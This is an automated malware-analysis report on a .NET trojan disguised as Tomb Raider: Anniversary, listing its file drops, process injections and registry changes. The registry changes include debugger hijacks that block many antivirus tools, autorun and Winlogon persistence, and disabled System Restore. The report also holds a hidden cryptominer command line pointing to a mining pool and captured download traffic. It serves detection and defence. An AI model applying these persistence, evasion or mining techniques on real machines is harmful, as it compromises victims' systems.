Trojan.MSIL.Bladabindi.2_cd8552c36a

by malwarelabrobot on May 12th, 2014 in Malware Descriptions.

Trojan.MSIL.Citron.ks (Kaspersky), Trojan.GenericKD.1607040 (B) (Emsisoft), Trojan.GenericKD.1607040 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


This description was generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: cd8552c36a49c885054202b0ec31b79a
SHA1: 72600be5c1ad5d2e1aa6a4ccaf0ff336b454d562
SHA256: c489131bea17df0bb57ff25187313adee776b8fe9655205f53ded82700a12420
SSDeep: 6144:wpMvLP3P8CzGNErLTIdVAysdEM8WLDH2fGMMcHrxmVWI0y12lh8hIpSchJ7dX:Qa/kCzaEfoAP0cHlfGMMcHi70y12lhOC
Size: 385024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-12 16:02:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672

The Trojan injects its code into the following process(es):

cvtres.exe:3500
nt32.exe:1324
%original file name%.exe:1180
63462.exe:2876

File activity

The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process nt32.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)

The process %original file name%.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\load32.vbs (901 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)

Registry activity

The process WScript.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 14 2C B3 A3 65 26 38 5D 96 96 55 38 67 53 E1"

The process WScript.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 1D 6F F9 83 AC 69 97 A6 1C 3E A6 6D 90 C0 9F"

The process cvtres.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A3 2D 47 C1 E2 08 0E FC 2D 80 E2 A5 3A 7A 68"

The process cvtres.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 5A D0 36 4C BB 93 51 22 AB 3A 65 67 42 E4 A8"

The process nt32.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"63462.exe" = "Tomb Raider: Anniversary"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E6 AC A4 EE E6 B0 25 8B D7 E9 23 36 50 A7 73"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE security-zone settings so that local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry.
The Trojan disables automatic startup of applications by deleting the following autorun values:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"

"VMware User Process"

"VMware Tools"

"Adobe ARM"

"SunJavaUpdateSched"

"Adobe Reader Speed Launcher"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"

The process vbc.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 E9 8C 2D 08 26 25 91 07 6C A3 FC DB 92 73 2D"

The process vbc.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 5E 81 E2 3D E2 41 6E FF C5 45 84 4D D0 18 17"

The process vbc.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 1F 91 3E 35 F5 77 A1 B8 AD 93 DC 0F 62 D3 E0"

The process vbc.exe:3780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 97 A3 BC CF 7F 1D 71 8F 2F EB 51 47 90 7B 36"

The process vbc.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 88 86 FB A4 8F 14 18 46 E6 B8 8C 49 C6 3E AF"

The process %original file name%.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = "Tomb Raider: Anniversary"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A FD 36 BB E0 02 ED BB E3 30 CF 4B FB CA F4 2E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE security-zone settings so that local web-nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

To run itself automatically each time Windows boots, the Trojan adds the following link to its file under the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry.
The Trojan disables automatic startup of applications by deleting the following autorun values:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"

The process 63462.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 7B 99 8F 38 65 F9 35 65 2D C5 64 2B 0F E3 1F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

Dropped PE files

MD5 File path
67f5238229333c061092f5a32e8c2ee1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\svchost.exe
e4f7c0be34da7869241a69d2ff932843 c:\NTKernel\63462.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Eidos Inc.
Product Name: Tomb Raider: Anniversary
Product Version: 1.0.9
Legal Copyright: Copyright (C) 2007 Eidos Inc.
Legal Trademarks: Crystal Dynamics(R), the Crystal Dynamics(R) logo and the Eidos(R) logo are registered trademarks of the Eidos Group of Companies
Original Filename: FlvPlayer.exe
Internal Name: FlvPlayer.exe
File Version: 1.0.9
File Description: Tomb Raider: Anniversary
Comments: Tomb Raider: Anniversary
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 261812 262144 5.20951 73fb6f02c868f34b09ac3c9e87b325a8
.rsrc 270336 118784 118784 4.34853 616065ae9776e72156a40aa493baa087
.reloc 393216 12 512 0.070639 f2d0169b522fda54bd2715b38c473014

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=11504
Date: Sun, 11 May 2014 03:57:55 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2


GET /api/1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked



GET /api/1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: ge.tt


HTTP/1.1 307 Temporary Redirect
location: hXXp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked


GET /1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: w524017.open.ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798
connection: keep-alive
transfer-encoding: chunked


GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "ca32618c4340c20d208aad10883a84d6:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 37283
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl

<<< skipped >>>

GET /CSC3-2009.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "1bafe804fc42b27d2a70335cb2162128:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 2249
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl

<<< skipped >>>

GET /pca3-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "072641a27cd10308fabc881f069f37c1:1396126208"
Last-Modified: Sat, 29 Mar 2014 20:50:08 GMT
Accept-Ranges: bytes
Content-Length: 1415
Date: Sun, 11 May 2014 03:57:53 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0
:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1
(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign T
rust Network..140320000000Z..140630235959Z0...0!...=...X.FL...3..I..08
0403173458Z0!...SJs|.."E.G.......070412172616Z0!....E........W6.n...14
0129192923Z0!.......jvO..!....]..040401180422Z0!......\*....bO-.....08
0403173459Z0!....I..:.<....9..m..070412172523Z0!.........R.E!..=t..
.070522172634Z0!....}.....}.}.(q.C..040401180606Z0!...`.6..,...u.~x.:.
.080403173459Z0!.........wX.....~...080606171636Z0!..$.Jn>.t..d_j..
."..040401180518Z0!.. ..N*(.}H..j......070412172308Z0!.. ..3.J......d.
.9..070522172711Z0!..50.h.:....s.K"....040401180542Z0!..7_f...s.......
....080403173459Z0!..<.J..y..)..~x7.e..080606171735Z0!..NS.c.f.....
.7.p...070412172213Z0!..N.k;..-...9J..-...070522172748Z0!..Q..2pRv.WC.
:..f...030109181346Z0!..Tq..m..*..........140129192925Z0!..^..CX4.3...
F.R...070522172548Z0!..^..)..P3...7...L..080403173459Z0!..e........O.
^.S....080403173457Z0!..jP....Wv..[.v.5H..070412172102Z0!..nk.l.!y.~..
.7G@...070412171752Z0!..r.q.I-Ln./........080403173458Z0!..t8....D....
.......080606171524Z0!..t.xn.tS....O_.....070412171951Z0!..v......Qnw.
.W.g...140129192921Z0...*.H................V.!F.Y..p.V......s..%..*l.z
=...R./.F....q.......D.t......0b..?.R:9.(.|.....VBp8.......PZ...[o\p..
.U...........$).V.D....B@..
....

<<< skipped >>>

GET /pca3-g5.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "895f8ccd92dfec674c94f0d04d1b63bc:1396128308"
Last-Modified: Sat, 29 Mar 2014 21:25:08 GMT
Accept-Ranges: bytes
Content-Length: 533
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..140320000000Z..140630235959Z0...*.H.............
}...a.D[..8..i.....g8..S..tt..a.e.B]..v.l9.m.....~.G(l...G..#z{...Za..
F.q....2^X..w.i'.&..n...4v8. &|/Y.B..%..J..g0."k.0....A..7.)h...=5....
